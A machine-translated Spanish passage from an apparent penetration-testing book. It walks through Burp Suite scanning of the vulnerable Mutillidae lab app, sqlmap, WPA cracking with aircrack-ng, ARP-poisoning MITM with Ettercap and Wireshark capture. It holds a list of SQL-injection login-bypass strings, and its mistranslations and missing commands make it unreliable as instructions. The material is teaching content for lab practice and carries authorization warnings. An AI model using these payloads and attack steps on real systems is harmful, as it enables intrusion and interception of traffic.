sourceforge.net y descargar una copia de la máquina virtual haciendo clic en el elemento zip de
Linux metasploitable.
A continuación, debe habilitar el proxy Burp seleccionándolo en el menú del proxy foxy, que
instaló en el capítulo anterior. Vuelva a cambiar al proxy Burp, haga clic en la pestaña Proxy,
luego en la pestaña Interceptar y luego haga clic en el botón Interceptar para desactivarlo.
No necesita interceptar ninguna solicitud por el momento. A continuación, haga clic en la pestaña
Destino y asegúrese de que la pestaña del mapa del sitio esté seleccionada. Debería ver la URL
de mutilidae que acaba de atrapar y reenviar.
El siguiente paso que debe hacer es agregarlo al alcance. Haga clic derecho en la carpeta
mutilidae y seleccione el elemento "Agregar al alcance". El ámbito define dónde se pueden
realizar análisis y pruebas automatizados, y le ayuda a no analizar de forma activa los dominios
que están fuera de su ámbito.
Los escáneres de vulnerabilidades son herramientas automatizadas que rastrean una aplicación
para identificar las firmas de vulnerabilidades conocidas. Los escáneres de vulnerabilidades son
ruidosos y, por lo general, los detecta la víctima.
Sin embargo, los escaneos con frecuencia se ignoran como parte de un sondeo regular en
segundo plano en Internet. Burp Scanner es un escáner de aplicación web dinámico incluido en
la adición profesional del software Burp Suite.
escaneo completo completo. Una vez más, utilizará el sitio web mutillidae.com para lograr su objetivo.
Consulte el capítulo anterior para comprender los conceptos básicos de cómo usar Burp Suite antes de
continuar.
Una vez que esté listo, haga clic en el ícono de proxy foxy para habilitar el proxy de Burp Suite y
seleccione su proxy de la lista. Actualice la página y vuelva a Burp Suite. Seleccione la pestaña Proxy,
luego la pestaña Intercept y apague la intercepción.
De manera predeterminada, el escáner Burp está configurado para realizar un escaneo pasivo en todos
los dominios, mientras que el escaneo activo está deshabilitado. En la pestaña del escáner Burp,
seleccione "Escaneo en vivo" y asegúrese de que la opción "Usar alcance de la suite" esté seleccionada
en la sección de escaneo activo en vivo.
A continuación, seleccione la pestaña Objetivo, luego la pestaña Mapa del sitio y expanda su objetivo.
A continuación, es hora de comenzar a rastrear la aplicación, así que cambie a la pestaña Araña para
ver el progreso del rastreo.
Una vez que los números dejen de subir, significa que ha terminado el proceso de ejecución. Una vez
que se complete el proceso de rastreo, regrese a la pestaña Mapa del sitio, haga clic derecho en su
objetivo y seleccione el elemento "escanear activamente esta rama".
Burp Suite mostrará una nueva ventana llamada "asistente de escaneo activo". Esta es una herramienta
de configuración fácil para el escáner Burp. El primer paso en esta configuración es este proceso que
le permite eliminar tipos específicos de recursos, incluidas imágenes, JavaScript o estilos de hojas.
En la mayoría de los casos, la configuración predeterminada es adecuada, por lo que todo lo que tiene
que hacer es hacer clic en el botón siguiente. En la siguiente pantalla, la herramienta mostrará una
tabla que contiene la lista completa de puntos finales y parámetros que el escáner Burp incluirá durante
el escaneo.
Es importante revisar cuidadosamente la lista y eliminar los puntos finales que no sean relevantes o
que puedan causar fallas. Una vez que haya finalizado su selección, haga clic en Aceptar para
comenzar a escanear.
Luego, puede monitorear el progreso revisando la "pestaña de cola de escaneo" en el escáner Burp.
Esta tabla proporciona información sobre las solicitudes de escaneo completadas y en curso.
Del mismo modo, proporciona una visión general de los resultados al mostrar el número de
Machine Translated by Google
problemas descubiertos para cada endpoint. De esta tabla también puede eliminar elementos
seleccionando esos recursos, luego haga clic con el botón derecho y seleccione el elemento de eliminación.
No obstante, puede analizar los resultados en cualquier momento comprobando los resultados en la
pestaña Resultados del escáner de eructos. Al igual que en la sección Mapa del sitio, esta visualización
agrupa las vulnerabilidades por puntos finales y categorías con una representación conveniente.
Al mostrar el nombre del problema que ha encontrado, también se mostrará información como una
estimación del impacto del sistema afectado, una estimación de la confianza de las herramientas.
Estos pueden ser ciertos, firmes o tentativos, y también mostrará el punto final específico afectado
por la vulnerabilidad de seguridad.
Una vez que se hayan analizado todos los recursos y se haya completado el escaneo, puede exportar
los resultados. Un escáner Burp le permite crear informes HTML o XML básicos que se pueden usar
para realizar un seguimiento de las vulnerabilidades descubiertas.
Además, otras herramientas de seguridad como Metasploit te permitirán importar esos resultados
para realizar otras tareas. En la pestaña Resultados, seleccione todos los elementos que desea
exportar.
Luego seleccione el nodo raíz para exportar todos los hallazgos. Haga clic derecho en el menú
"Seleccionar el contexto" y haga clic en el elemento "Informar problemas seleccionados".
Una nueva ventana titulada "Informes del escáner de eructos" le guiará a través del formato del
informe. Puede utilizar la selección de HTML y hacer clic en Siguiente.
Dentro de esa pantalla, puede personalizar el nivel de detalles que se incluirán en el informe. Por
ejemplo, puede decidir tener el nivel máximo de detalles seleccionando todas las casillas de
verificación y luego haciendo clic en el botón siguiente.
Machine Translated by Google
Como a veces es útil proporcionar instantáneas de las solicitudes y respuestas HTTP afectadas, también
puede decidir incluir extractos relevantes en el informe final.
Seleccione la casilla de verificación adecuada y luego haga clic en Siguiente. En este paso, el asistente
de informes del escáner Burp le permite seleccionar o anular la selección de categorías de problemas
para exportar.
Tome su decisión y seleccione las casillas de verificación apropiadas. Puede seleccionarlos todos y hacer
clic en Siguiente. Finalmente, en el último paso, debe especificar el nombre de archivo del informe.
Haga clic en el botón Seleccionar archivo y explore su sistema de archivos para encontrar una carpeta
donde desee guardar el informe, luego escriba el nombre del archivo, incluida la extensión del archivo, y
haga clic en el botón Guardar. A continuación, asigne un título a su informe.
Además, puede personalizar el diseño del documento cambiando el orden del contenido seleccionando
la organización del problema o la tabla a nivel de contenido. Finalmente, haga clic en el botón Siguiente.
Al final del asistente, una barra de progreso le proporcionará información sobre la generación del informe.
Una vez completado, puede hacer clic en el botón Cerrar.
Machine Translated by Google
Los tokens de sesión se utilizan normalmente para realizar un seguimiento de las sesiones, ya
que, de forma predeterminada, HTTP es un protocolo sin estado. En este capítulo, nos
aseguraremos de que los tokens de sesión se aleatoricen correctamente y no se puedan adivinar.
En este ejemplo, puede probar el sitio mutillidae.com, una aplicación web vulnerable, que está
instalada de manera predeterminada en el host metasploitable de Linux.
Bueno, el servidor envía un token de sesión cuando su navegador no envía una sesión
equilibrada como solicitud.
Para ensuciar el servidor web por primera vez, debe realizar su solicitud borrando el historial del
navegador y asegurarse de que la opción de cookies esté seleccionada.
Luego, use Burp Suite para interceptar la solicitud. Actualice su página y regrese a Burp Suite
en la pestaña Proxy donde debería ver en su solicitud que el token de sesión no está presente.
A continuación, si hace clic en el botón de reenviar para enviar la solicitud al servidor, obtendrá
una respuesta con una cookie y una nueva ID de sesión.
Haga clic en el botón de reenviar para enviar las solicitudes restantes, y una vez que vea una
pantalla en blanco, sabrá que su trabajo ha terminado.
Haga clic en la pestaña Historial y seleccione un elemento de la lista. Debería ver el encabezado
de su primera solicitud en la sección inferior, así que haga clic en la pestaña Respuesta y haga
clic con el botón derecho dentro de la sección y envíelo al secuenciador.
Una vez que haga clic en "Enviado al secuenciador", salte a la pestaña Secuenciador e
identifique qué tokens de sesión son importantes para usted.
Una vez que elija su token, puede hacer clic en "Iniciar captura en vivo" para comenzar a generar
tokens de sesión. Aparecerá una nueva ventana y comenzará a procesar y generar tokens.
Después de finalizar la captura en vivo, puede comenzar a analizar los tokens de sesión y Burp
Suite le brindará un resumen de la aleatoriedad de sus tokens de sesión.
Machine Translated by Google
Hay muchas otras características dentro de la herramienta de secuenciador de Burp, por lo que
recomiendo pasar algún tiempo tratando de entender cómo se generan los tokens de sesión.
Todas las principales aplicaciones web utilizan diferentes tipos de implementaciones y algoritmos
para generar tokens de sesión.
Machine Translated by Google
Cuando realiza una prueba de pluma de una aplicación web, lo primero que puede hacer es
rastrear el host mediante Burp Suite. Significa que Burp rastreará todo el sitio web y registrará
todos los diferentes archivos y métodos HTTP en ese sitio. ¿Por qué arañas al anfitrión?
Bueno, esto se debe a que necesita identificar dónde están todos los enlaces, qué tipos de
parámetros se usan en la aplicación, a qué sitios externos también hace referencia la aplicación
y el diseño general de cómo funciona la aplicación.
Para rastrear su aplicación, debe asegurarse de que la pestaña de destino esté seleccionada y
luego la pestaña del mapa del sitio también esté seleccionada. A continuación, haga clic con el
botón derecho en el dominio que agregó a su alcance anteriormente y luego haga clic en el
elemento llamado "arañar esta rama".
Una vez que se completa el proceso de rastreo, Burp debería tener un buen diseño de cómo se
ve exactamente la aplicación. También puede hacer clic en cualquier archivo de la lista que
proporciona Burp para ver cuál fue la solicitud y la respuesta.
En general, se prefiere agregar primero todos sus dominios al alcance y luego hacer clic en el
filtro para mostrar solo aquellos que están en el alcance.
A veces, las páginas o carpetas no están vinculadas directamente desde una aplicación web.
Por ejemplo, a menudo se ve que la carpeta de administración o las páginas de inicio de sesión no se
mencionan en ninguna parte del sitio web.
Esto se debe a que los administradores del host intentan ocultar estas carpetas y páginas
administrativas de inicio de sesión a los usuarios generales. Este tipo de cosas que está
buscando en su prueba de penetración, para que pueda intentar eludir o fuerza bruta el proceso
de autorización.
Hay un módulo específico dentro de Burp que es extremadamente útil en estos escenarios
llamado "descubrir contenido".
debería detenerlo.
A continuación, haga clic en el hipervínculo "mutillidae". Mutillidae es una aplicación de piratería web
vulnerable compuesta por scripts PHP que son vulnerables a las 10 principales vulnerabilidades de
OWASP.
Puede iniciar un nuevo ataque en el sitio simplemente visitando la página web de mutillidae.com.
Burp Suite ya debería reconocer su existencia.
A continuación, vuelva a Burp Suite y haga clic en la pestaña "Objetivo", seleccione su dominio, haga
clic derecho sobre él y agréguelo al alcance.
Después de esto, debe rastrear la aplicación, pero antes de hacerlo, hay algo que debe tener en
cuenta.
Debido a que el sitio web mutillidae.com tiene muchos formularios cuando rastrea la aplicación, Burp
Suite abrirá un cuadro de diálogo pidiéndole que ingrese las credenciales manualmente para cambiar
este comportamiento predeterminado, por lo que debe hacer clic en la "pestaña Spider" y luego
seleccionar " Pestaña de opciones”.
Nota: Algunas personas prefieren usar otros usuarios administradores para eludir la autenticación por
inyección de SQL.
El hecho es que hay varias formas de omitir la autenticación, por lo tanto, enumeraré a continuación
todas las variaciones de contraseñas de administrador que encontré antes;
“administrador' --“
“admin' #“
“admin'/*“
“admin' o '1'='1“
“admin' o '1'='1'--“
“admin' o '1'='1'#“
“admin' o '1'='1'/*“
“admin'o 1=1 o ''='“
“admin' o 1=1“
“admin' o 1=1--“
“admin' o 1=1#“
“admin' o 1=1/*“
“admin') o ('1'='1“
Machine Translated by Google
“admin') o ('1'='1'--“
“admin') o ('1'='1'#“
“admin') o ('1'='1'/*“
“admin' ) o '1'='1“
“admin') o '1'='1'--“
“admin') o '1'='1'#“
“admin') o '1'='1' /*“
“administrador" --“
“administrador" #“
“administrador"/*“
“admin" o "1"="1“
“admin" o "1"="1"--“
“admin" o "1"="1"#“
“admin" o "1"="1"/ *“
“admin" o 1=1 o ""="“
“admin" o 1=1“ “admin" o
1=1--“ “admin" o 1=1#“
“admin" o 1=1/*“
“admin”) o ("1"="1“
“admin") o ("1"="1"--“
“admin") o ("1"=" 1"#“
“admin”) o ("1"="1"/*“
“admin") o "1"="1“ “admin")
o "1"="1"--“ “admin" ) o
"1"="1"#“ “administrador”)
o "1"="1"/*“
Cuando vea que los números dejan de subir, significa que ha terminado el proceso de
ejecución. Una vez que se complete el proceso de rastreo, regrese a la pestaña "Mapa del
sitio", haga clic derecho en la carpeta Mutillidae del menú desplegable, seleccione
"Herramientas de participación" y luego haga clic en "Descubrir contenido".
Una vez dentro de su módulo de descubrimiento, puede hacer clic en el botón "La sesión
no se está ejecutando" y la aplicación iniciará la fuerza bruta inteligente.
En este momento, el ataque de fuerza bruta está aprendiendo de los archivos y carpetas
que encuentra dentro de la aplicación e intenta tomar mejores decisiones para la fuerza bruta.
Esta técnica proporciona un proceso eficiente para identificar carpetas y archivos de prueba
de su aplicación. Puede hacer clic en la pestaña "Mapa del sitio" en la parte superior de la
Machine Translated by Google
módulo de descubrimiento y vea todos los resultados del análisis de fuerza bruta.
La vulnerabilidad más común y explotable en los sitios web es la vulnerabilidad de inyección que
ocurre cuando el sitio web de la víctima no monitorea las entradas.
Por lo tanto, permitir que el atacante interactúe con la base de datos de back-end. Una de las
herramientas más útiles para evaluar las vulnerabilidades de inyección SQL se llama SQLmap.
Si está utilizando metasploitable, existe la posibilidad de que necesite arreglarlo para el sitio web
mutillidae.com. Primero, debe conectarse a su host metasploitable mediante SSH.
En este archivo, debe asegurarse de que la cadena de conexión apunte a la base de datos
OWASP 10. Una vez completado, puede comenzar su tarea de inyección de SQL.
Esta página es vulnerable a la inyección SQL, por lo que debe interceptar la solicitud que envió al
servidor utilizando Burp Suite. Antes de hacer clic en "Ver detalles de cuentas", debe asegurarse
de que Burp Suite esté activo.
datos más probable para almacenar los datos de las aplicaciones es la base de datos OWASP 10,
por lo tanto, deberá verificar las tablas de esa base de datos, utilizando el comando:
Machine Translated by Google
presiona enter. Los datos de retorno de la ejecución de este comando deberían mostrarle
las tablas disponibles dentro de la base de datos OWASP.
Luego, verifique la tabla de cuentas y descargue los datos de esta tabla. Puede enumerar
las tablas en la base de datos con el siguiente comando: "sqlmap -u "URL" --tables -d
nombre_de_la_base de_datos"
Puede enumerar los nombres de las columnas en una tabla con otro comando:
Para ejecutar un ataque de diccionario en una red inalámbrica donde la red inalámbrica
está protegida con WPA o WPA2, seguiremos un proceso de cuatro pasos.
Primero, queremos averiguar el BSSID del punto de acceso contra el que queremos
ejecutar nuestro ataque de diccionario. Una vez que hayamos encontrado el punto de
acceso que queremos atacar, debemos decidir la lista de palabras que queremos usar
para el ataque.
Una lista de palabras, como sugiere el nombre, es una lista de palabras, como un
diccionario, y vamos a probar esa lista de palabras con el punto de acceso.
El tercer paso es que vamos a generar tráfico de autenticación. Para que este ataque
funcione, necesitamos poder capturar a un usuario legítimo que se conecta al punto de
acceso y vamos a generar ese tráfico, para que podamos rastrearlo por aire. Por último,
tenemos que ejecutar el ataque de diccionario.
Para este ataque, usaremos Kali Linux. Para hacer eso, debe abrir una terminal y mirar
la configuración. Escriba "iwconfig" y debería ver dos de sus adaptadores inalámbricos
de LAN inalámbrica. Wireless wlan1 debe ser la tarjeta LAN inalámbrica de su dispositivo
Este es también el que usará para ejecutar su ataque. Por lo tanto, lo primero que debe
hacer es poner la tarjeta WLAN de Kali Linux en modo monitor, pero antes de hacerlo,
debe desconectar su adaptador LAN inalámbrico escribiendo: "ifconfig wlan0 down"
Siguiente tipo:
Este comando pondrá su adaptador de LAN inalámbrica en modo monitor. Pero para
asegurarse de que la wlan esté respaldada, debe escribir el comando: "ifconfig wlan0 up"
Machine Translated by Google
Ahora que su adaptador de LAN inalámbrica está respaldado, desea confirmar que ahora está
en modo de monitor. Para hacer eso, tienes que escribir el comando:
"iwconfig"
Aquí, debería ver donde dice "Modo", junto a eso, debería decir que la tarjeta ahora está en
modo monitor. Su próximo paso es encontrar el BSSID del punto de acceso que desea atacar.
Para eso vas a usar la herramienta llamada Aircrack, entonces tienes tipo: “airodump-ng wlan0”
Esto comenzará a buscar BSSID-s transmitidos. Aquí, verá que está capturando los BSSID de
los puntos de acceso circundantes y los canales que están utilizando.
NOTA: No comprometa la conexión inalámbrica de sus vecinos o, lo que es peor, no utilice esta
herramienta en un entorno de producción, a menos que tenga una autorización por escrito.
Volviendo a Kali Linux, para salir del monitoreo, puede presionar “Ctrl+C” para detener la
búsqueda una vez que haya encontrado su BSSID inalámbrico que va a atacar.
Dentro de la salida de Kali, también debe tener la dirección MAC del BSSID, que normalmente
es una letra de 12 caracteres y números de los que debe tomar nota, porque necesitará esa
dirección MAC cuando ejecute el ataque. .
El siguiente paso es encontrar una lista de palabras que pueda usar para ingresar al punto de
acceso, y Kali tiene varias herramientas que puede usar para este propósito.
También puede descargar otras herramientas similares, pero la herramienta llamada "Airodump"
simplemente hará el trabajo. Por lo tanto, debe escribir:
NOTA: Esto es solo un ejemplo, pero donde dije "00:11:22:33:44:55:66", debe escribir la
dirección mac real del BSSID que está a punto de comprometer, así como el el canal para usted
podría ser el canal 6 o el canal 11.
Una vez que haya ejecutado con éxito el comando anterior, verá que se ha iniciado el monitoreo
de la red wlan0.
Machine Translated by Google
Aquí, verá la transferencia de datos en la columna "datos". Tenga en cuenta que todo
depende de la complejidad de la contraseña, ya que puede tardar unos minutos.
Después de haber esperado unos minutos, debería tener suficientes datos con los que
pueda trabajar, por lo tanto, debe abrir una nueva terminal y escribir:
"Ls"
Esto mostrará una lista de los archivos que ha capturado hasta ahora. Ahora para
descifrar la contraseña, debe escribir el siguiente comando: "aircrack-ng
wepcracking-01.cap"
Aquí, el nombre de archivo "wepcracking-01.cap" es un ejemplo, pero debe escribir allí
el nombre de archivo que haya recopilado y llamado con el comando "ls", junto al
nombre de archivo "Público".
Por último, le pediré nuevamente que se asegure de tener una autorización por escrito
para usar Airodump-ng en un entorno de producción o en vivo. Si solo está practicando
en el laboratorio de su casa, en un entorno que no sea de producción, eso no debería
causar ningún problema a nadie; aún así, te sugiero que apagues tu enrutador y
practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google
Imagine que se le ha asignado llevar a cabo un ataque MITM (Man in the Middle) contra
un host o servidor específico, y la elección de las herramientas a utilizar depende de usted.
,
Hay varias formas de llevar a cabo un ataque MITM y en este capítulo vamos a utilizar
otra excelente herramienta que podría considerar llamada EtterCAP.
EtterCAP es otra excelente manera de realizar un ataque MITM, ya que tiene una interfaz
gráfica de usuario o GUI fácil de usar que proporciona el llamado método de clic, selección
y listo.
Luego presiona enter. Una vez que se inicia EtterCAP, esperará a que le proporcionemos
más instrucciones, y primero debe hacer clic en una opción del menú: Sniff > luego
seleccione "unified sniffing".
Esto creará algunas opciones de menú adicionales, por lo que ahora debe hacer clic en
la opción de menú: "Host", luego haga clic en "Buscar hosts".
Esto no debería tomar más de 5 segundos para descubrir todos los hosts que están en la
misma red. Una vez completado, regrese al icono del menú; Host > luego haga clic en las
listas de hosts para ver todas las direcciones IP de los hosts y las direcciones MAC
asociadas a ellos.
Una vez que tenga una lista de hosts, puede resaltar la dirección de origen y hacer clic en
"Agregar al destino 1", luego resalte la dirección de destino y haga clic en "Agregar al
destino 2".
Machine Translated by Google
Sin embargo, si usamos ARP Poisoning, podríamos falsificar la dirección de origen real
diciéndole al destino que tenemos la dirección IP y la dirección Mac del nodo de origen, por lo
que todo el tráfico que está planeado para llegar al host de origen real, de ahora en adelante ,
vendría primero a nosotros.
Además, todo el tráfico que está planeado para llegar al host de destino también nos llegará
a nosotros, ya que también envenenamos la fuente real y le decimos que la dirección IP de
destino y la dirección Mac ahora son nuestra máquina.
El uso de ARP Poisoning es uno de los mejores métodos para crear un ataque Man in the
Middle, ya que ahora todo el tráfico que va y viene entre el origen y el destino en realidad
pasa por nosotros.
Teniendo todo ese tráfico capturado, podemos decidir si solo queremos analizarlo, capturarlo,
modificarlo, reenviarlo a un destino diferente o simplemente detener la comunicación entre
esos dispositivos.
Por lo tanto, la pieza final para lanzar un ataque de este tipo es hacer clic en el ícono de menú
llamado "MITM" y luego seleccionar "Envenenamiento ARP". Una vez que haya terminado y
desee detener el envenenamiento ARP, haga clic en "Detener ataque(s) MITM".
Por último, le pediré nuevamente que se asegure de tener una autorización por escrito para
usar este método en un entorno en vivo o de producción, ya que cualquier tipo de ataque Man
in the Middle es muy peligroso, especialmente cuando manipula el tráfico enrutado mediante
el envenenamiento de las tablas ARP. alimentando direcciones Mac falsas.
Que todas las computadoras conectadas a la red procesen el paquete de transmisión ARP sería
una pérdida de recursos. En cambio, las tarjetas de interfaz de red de los dispositivos en la red
para los que no está destinado el paquete, reconocen que el paquete no es para ellos, por lo
que el paquete se descarta, en lugar de pasar a la CPU para su procesamiento.
Una vez que el paquete llega a la CPU, la herramienta llamada Wireshark puede capturarlo para
su análisis. Hay tres formas principales de capturar el tráfico de un dispositivo de destino en una
red conmutada.
El segundo método para capturar el tráfico de un dispositivo de destino en una red conmutada
es mediante un toque. También conocido como "toma de red", que es un dispositivo de hardware
que puede colocar entre dos puntos finales en su sistema de cableado para capturar el tráfico
entre ellos.
Del mismo modo, el conmutador de red debe admitir la duplicación y tener un puerto no utilizado
en el que pueda conectar su rastreador. Puede configurar Port Mirroring en la mayoría de los
conmutadores de Cisco una vez que se haya conectado, ya sea mediante "SSH" o un cable de
consola.
Para habilitar la duplicación de puertos, emite un comando que obliga al conmutador a copiar
todo el tráfico de un puerto a otro puerto. Pero primero, debe enumerar los puertos en un
conmutador emitiendo el comando "show ip interface brief"
ya que solo vamos a ver un ejemplo simple. Una vez que haya enumerado los puertos Ethernet
disponibles, digamos que desea instalar su sniffer en el puerto 2 y reenviar todo el tráfico del puerto 1
al puerto 2.
terminal" de solo
"conf t"
Luego presiona enter. A continuación, debe especificar el puerto de origen, que es el puerto 1 para
nuestro ejemplo, por lo que inicia su comando escribiendo "monitor", seguido de un número de sesión
aleatorio.
El número de sesión puede ser cualquier número de su elección y luego especifica que es una fuente;
y finalmente ingresas el número de puerto.
Luego escribe el número de puerto de destino, y aquí es donde se encuentra su rastreador. Mismo
comando con el mismo número de sesión, pero esta vez es un destino y el número de puerto es 2.
"conf t"
"Salida"
"Salida"
"escribir memoria"
Para verificar su sesión de monitoreo, puede escribir el comando "mostrar sesión" seguido del número
de sesión, en este caso 1 de la siguiente manera;
Cualquiera puede escuchar las señales inalámbricas que se transmiten por el aire.
Cuando escucha señales inalámbricas, puede sintonizar su radio para escuchar tráfico
específico que va hacia y desde un cliente, o hacia y desde un punto de acceso o puede
simplemente escuchar todo y luego filtrar lo que desea escuchar en un tiempo posterior
Al igual que si se lleva la mano a la oreja para escuchar mejor o tal vez un vaso a la
pared para escuchar la conversación al otro lado de la pared, con la conexión
inalámbrica, puede usar una antena direccional para captar más señal. fuerza desde
una dirección determinada.
Lo que eso significa es que puedo estar a cierta distancia del punto de acceso o de su
cliente, y aun así poder capturar el tráfico por aire. Lo que eso significa es que no sabes
que estoy espiando tu tráfico.
Pero, ¿cómo puedo escuchar y capturar tráfico? Bueno, escucho sintonizando mi radio
en el canal de frecuencia, recopilando todas las señales, procesando esas señales en
mi pila de protocolos y luego mostrándolas con una herramienta de análisis de paquetes
como Wireshark.
Escuchar por aire es una de las mejores formas de realizar un reconocimiento pasivo.
El reconocimiento pasivo es cuando recopila información sobre una red, una corporación
o un individuo, pero no se involucra activamente con el sistema, la red o el individuo.
Es posible que esté recopilando información como, por ejemplo, ¿cuál es el fabricante
de sus puntos de acceso? ¿Cuáles son las direcciones MAC que utilizan los clientes?
¿Qué mecanismos de seguridad utiliza una empresa en particular? ¿Cuáles son los
nombres de las redes? ¿Tienen acceso de conjetura configurado en estos puntos de acceso?
¿Tienen nombres de red ocultos?
acceder a una red empresarial, la tecnología inalámbrica tiene que ser uno de los tres
enfoques principales para descubrir información con el fin de planificar ese ataque.
Para capturar y mostrar el tráfico que pasa por el aire, necesita una herramienta llamada
Wireshark. Puede descargar Wireshark desde su sitio web mencionado anteriormente, o
puede usar la herramienta que ya está disponible en Kali Linux.
Para hacerlo dentro de Kali Linux, vamos a seguir un proceso de cuatro pasos. Lo primero
que vamos a hacer es poner nuestro adaptador inalámbrico en modo monitor.
Eso permitirá que nuestro adaptador detecte todo en el aire, capture todo y lo pase a la
aplicación Wireshark para que se muestre y luego podamos analizar esos paquetes.
Podemos seleccionar todo por aire o podemos buscar tráfico de un BSSID específico o en
un canal específico. Una vez que hayamos seleccionado el BSSID y/o el canal, podemos
abrir Wireshark, seleccionar la interfaz de monitoreo que hemos configurado para nuestro
adaptador inalámbrico y comenzar a capturar datos.
Una vez que hayamos capturado suficientes datos, podemos guardar esa captura de paquetes para
luego analizarlos en otro momento.
"iwconfig"
Hay varias formas de habilitar el modo de monitor, como usar "iwconfig", pero
ese método no funciona para todos los adaptadores. Este método no funciona
para todos los adaptadores, por lo que si intentó habilitar en modo monitor usando el
comando anterior y no funcionó, o si funcionó pero el adaptador no se comportó como se
esperaba al usarlo, entonces una buena idea es intentar habilitar modo de monitor usando
un método diferente.
Ahora puede continuar y habilitar el modo de monitor, pero antes de hacerlo, es bueno
eliminar cualquier proceso que pueda interferir con el uso del adaptador en modo de
monitor. Para hacer eso tenemos que usar una herramienta llamada “airmon-ng” Escriba:
Aquí le diremos a Kali que queremos que verifique todos los procesos que pueden interferir
con el modo de monitor, y si encuentra algo, queremos que lo elimine. Comando muy
simple.
Si presiona enter, verá que eliminará algunos procesos y notará que el ícono del
administrador de red desaparece. Esto se debe a que este comando lo mata y perderá su
conexión a Internet si estaba conectado, pero está bien porque perderá su conexión a
Internet de todos modos si habilita el modo de monitor.
Al hacer esto, hace que el adaptador funcione mejor en modo monitor. Ahora está listo
para habilitar el modo de monitor, y en lugar de usar el comando "iwconfig"
Puedes usar:
Una vez más, airmon-ng es el nombre del programa que estamos usando para habilitar el
modo de monitor. “Iniciar” significa que queremos iniciar el modo monitor, en una interfaz
llamada “wlan0”
Ahora, si su interfaz WLAN no es cero, sino 1 o 2, desea colocar el número correcto donde
hago referencia al cero con el número de su interfaz inalámbrica. Una vez que presione
enter, recibirá un mensaje que le indicará que el modo de monitor está habilitado en wlan0.
Ahora si escribes
Después de eso, cada vez que desee utilizar un programa que requiera el modo de monitor,
asegúrese de configurar la interfaz en "wlan0mon".
"iwconfig"
y eso no funcionó y luego probó este método también, y aún así no funcionó, entonces es
probable que su adaptador no admita el modo de monitor porque no todos los adaptadores
admiten el modo de monitor. Por lo tanto, debe consultar el capítulo sobre adoptantes
recomendados.
Continuando, una vez que su interfaz esté en modo Monitor, debería estar capturando el
tráfico por aire. Una vez que haya recopilado suficientes datos, es hora de mostrarlos.
Dentro de Kali Linux, vaya a Aplicaciones, baje hasta las 10 mejores herramientas de
seguridad de Kali Linux y allí está Wireshark. Haga clic en esa pestaña y aparecerá la
aplicación Wireshark que enumera sus interfaces.
Seleccione su interfaz inalámbrica, en mi caso es wlan0mon, y haga clic en Iniciar para ver
los datos de captura. Si observa los paquetes capturados, debería ver que hay una
combinación de solicitudes para enviar, autorización para enviar, un marco de baliza y
algunos datos de usuario.
Ahora puede guardar todos estos datos haciendo clic en "Guardar" o "Guardar como" y
puede retirarlos y analizarlos en una fecha posterior. Así de fácil es capturar información
por aire.
Machine Translated by Google
El escaneo TCP SYN se basa en el proceso de negociación de 3 vías para determinar qué
puertos están abiertos en un host de destino. El atacante envía un paquete TCP SYN a un
rango de puertos en la víctima, como si estuviera tratando de establecer un canal para la
comunicación normal en los puertos.
Por último, para el escenario de puerto filtrado, es posible que el atacante no reciba ninguna
respuesta. Eso podría significar que el puerto está filtrado por un dispositivo intermedio,
como un firewall o el propio host.
Por otro lado, podría ser que la respuesta se haya perdido en tránsito. En este escenario,
imagine que tiene tres hosts; el atacante que usará Kali Linux en 10.0.0.111, la máquina
víctima será un host con Windows 10 en 10.0.0.202, finalmente el probador de penetración
usará Kali Linux para interceptar todo el tráfico y analizar cualquier ataque a la red.
“nmap 10.0.0.202”
Desde la perspectiva del atacante, el escaneo está completo, pero él no sabe que
Machine Translated by Google
Si cambia a la máquina de prueba de penetración e intenta atrapar a este intruso, la mejor manera
de comprender el alcance de un escaneo es ver la ventana de conversaciones en Wireshark.
Allí, debería ver solo una conversación IPv4 entre el atacante en la dirección IP 10.0.0.111 y la
víctima en la dirección IP 10.0.0.202.
También verá que hay miles de conversaciones TCP entre estos dos hosts. Básicamente, una
nueva conversación para cada puerto involucrado en las comunicaciones, que es mucho.
Una vez que comprenda los diferentes tipos de respuestas que puede producir un escaneo SYN,
el siguiente pensamiento lógico es encontrar un método rápido para identificar qué puertos están
abiertos o cerrados.
La respuesta se encuentra dentro de la ventana de conversaciones. Una vez más, haga clic en la
pestaña "TCP". En esa ventana, puede ordenar las conversaciones TCP por "número de paquete"
con los valores más altos en la parte superior, haciendo clic dos veces en la columna "Paquetes".
Luego deberá hacer clic en “puertos escaneados” e incluir 3 paquetes en cada una de sus
conversaciones. Puede echar un vistazo a los detalles del primer paquete de la lista haciendo clic
en el botón "Seguir transmisión", luego cierre esta ventana y minimice la ventana de conversaciones.
De vuelta en la ventana principal de Wireshark, debería ver el paquete SYN inicial enviado desde
la máquina del atacante, y luego el paquete SYN/ACK correspondiente del host de la víctima y el
paquete de reinicio final enviado desde el host del atacante para finalizar la conversación.
Si vuelve a cambiar a la ventana "Conversaciones", también puede tener otros escenarios en los
que solo 2 paquetes participan en la comunicación.
Si revisa los detalles nuevamente, verifique el primer paquete SYN inicial y el segundo que es el
restablecimiento de la víctima, lo que indica que este puerto está cerrado.
Si las entradas restantes en la ventana de "conversación" incluyen solo un paquete, eso significa
que el host de la víctima nunca respondió al SYN inicial
Machine Translated by Google
Machine Translated by Google
Podemos lanzar un ataque Man in the Middle de múltiples maneras, ya sea usando Burp
Suite o EtterCAP; pero nunca hemos discutido cómo podemos recopilar los datos y
analizarlos y qué herramienta podemos usar para ese propósito.
Xplico también puede tomar archivos de Wireshark y analizarlos por usted. Wireshark
también tiene la capacidad de hacer una alimentación directa a Xplico, por lo tanto,
podemos capturar todo el tráfico y puede brindar otra excelente vista de lo que sucede
dentro de esa sesión que estamos escuchando a escondidas.
Xplico también viene como una herramienta integrada predeterminada dentro de Kali Linux.
Para iniciar la interfaz gráfica de usuario, puede seguir las opciones de menú como: Kali
Linux > Forensics > Network Forensics > xplico web gui Una vez que haya seleccionado
las opciones de menú mencionadas, se iniciará un servidor web en Kali. Si el servidor web
Apache aún no se está ejecutando, normalmente debe iniciarlo manualmente; pero si usa
su máquina Kali, automáticamente la iniciará por usted.
Si Apache ya se está ejecutando en segundo plano, Xplico usará esa función de servidor
para iniciarse. A continuación, le diría que use una URL específica para abrir Xplico, usando
un servidor web.
Puede optar por hacer clic en el enlace provisto para abrir Xplico, o simplemente puede
copiar y pegar la dirección en la sesión de su navegador. El enlace es: http://localhost:9876/
Otro método para iniciar Xplico es hacer clic con el botón derecho en el enlace
Por lo tanto, le sugiero que use el navegador Firefox copiando y pegando el enlace provisto.
